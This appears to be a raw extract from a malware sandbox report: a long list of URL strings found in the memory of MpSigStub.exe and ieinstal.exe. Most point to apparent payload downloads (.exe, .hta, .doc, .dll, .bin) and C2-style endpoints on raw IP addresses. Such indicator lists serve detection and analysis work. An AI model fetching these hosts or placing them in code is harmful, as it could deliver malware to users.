Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/d1c.dat
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/features.php
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://%s/in.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://%s/index.htm?content=%s&id=%d
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://%s/index.htm?id=%4d&content=%s
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://%s/inspection.aspx?index=stripbooks
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://%s/jbinfo.cgi?%s:%d
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://%s/kx.php
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/live.php?backupquery=%s
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/loads.php
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://%s/loads2.php?r=%s
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://%s/mirror/ret.aspx?content=%s
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/search/search.cgi?s
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/support.php
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://%s/sync.php
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%s%d%08dindex.asp?ToDowbSVCHOST.EXErbSeDe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%s%d%sindex.asp?%u%dOEMCP
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%sPOSTid=41.php?
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/index.cgi
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%s/bks.asp
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://%sMozilla/4.0
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://(.-/)
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://.(www.blackcheta.blogspot.com/)
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://.exeuser32.dll
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	String found in binary or memory: http://.ocx.cabhtml:file:ftp://
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://.online/
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://0.82211.net/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://00.1.00.2.1.11.9.online.secured.adobe.protected.file.version.9.8.online.verification.access.v
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://0c00.cc/0c_data.cc
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://1-0-9.cn/zxc/index.htm
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://102.165.32.158/dash/sk.hta
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/bigi.doc
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/p1.doc
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/u1.doc
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://103.213.245.135/n.hta
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://104.153.45.242/~cimbonli//wp-content/upload/ken.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://104.236.94.
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://104.243.35.43
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://107.170.47.94/mdsatalho/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://107.172.130.145/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.191.48/deck/m.dot
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.115:4560/press1.exe
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.80/
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.80/-.............................................................................
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://107.189.10.150/ht/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://108.61.208.60
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://109.248.148.42/officedocument/2006/relationships/templates.dotm
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://110.34.232.11:1314
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://110.42.4.180:
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://112.164.188.12/hza.html
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://116.37.147.205/hit.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://118.184.48.95:8000/info
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://119.249.54.113/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://120.125.201.101/logo/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://121.14.
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://122.228.228.7
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://123support.online/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://123zphimonline.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/down/list2.txt
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/m.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/tracking?source=
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:20202/remind.html
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8081/dial.html?
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8089/index.html?
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8332
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8545
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:9600/IperiusHSa
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://131.153.38.125/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://134.249.116.78/cloud.php/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://139.162.
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://144.217.14.173/doc.doc
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://149.202.110.58/document_012001.doc
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://149.3.170.235/qw-fad/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://151.248.115.253/%sproc0%%sproc0%exit
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://152.89.218.86/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://158.255.1.137/1/live.php
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://158.255.5.220
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://164.132.171.89/promo.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.35.111/~miraclen/sul2/sul2.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://169.54.172.92/coreslibri.zip
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://170.130.55.135/api.php
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://172.16.1.1/exm.rtf
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://172.98.73.57
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://178.128.11.199/qtx.
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://178.128.115.182/wp-includes/3_y/
Source: ieinstal.exe, 0000000D.00000002.19666716558.00000000031DD000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/
Source: ieinstal.exe, 0000000D.00000002.19666716558.00000000031DD000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/Qe
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/bvbs/Host_hKVPgVgQ234.bin
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19665992440.0000000003198000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.binhttp://178.32.63.50/bvbs/Host_hKVPgVgQ234.binwininet.dl
Source: ieinstal.exe, 0000000D.00000002.19665992440.0000000003198000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bink
Source: ieinstal.exe, 0000000D.00000002.19665992440.0000000003198000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.binm
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://178.62.19.66/campo/v/v
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://18.130.111.206/wp/x_y/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://181.174.166.137/sys/f4.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://185.183.98.246/150/DL-13306.jpg
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://185.239.242.71
Source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://191.101.239.86/root/migytkyt5bberd
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://192.236.147.189/execute/uploads/Excel.sct
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.235.1/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://195.5.116.250/ex/static.php
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://200.63.45.105/sado/sado.exe
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://200.74.240.151/saturno/w7.txt
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://200.74.240.151/saturno/w8.txt
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://200.98.
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/jMLqH8
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/pqbtwj
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/yxsz8k
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://207.58.162.237/spy/cartao.scr
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.54.161/files/crypt.dll
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/Q-2/
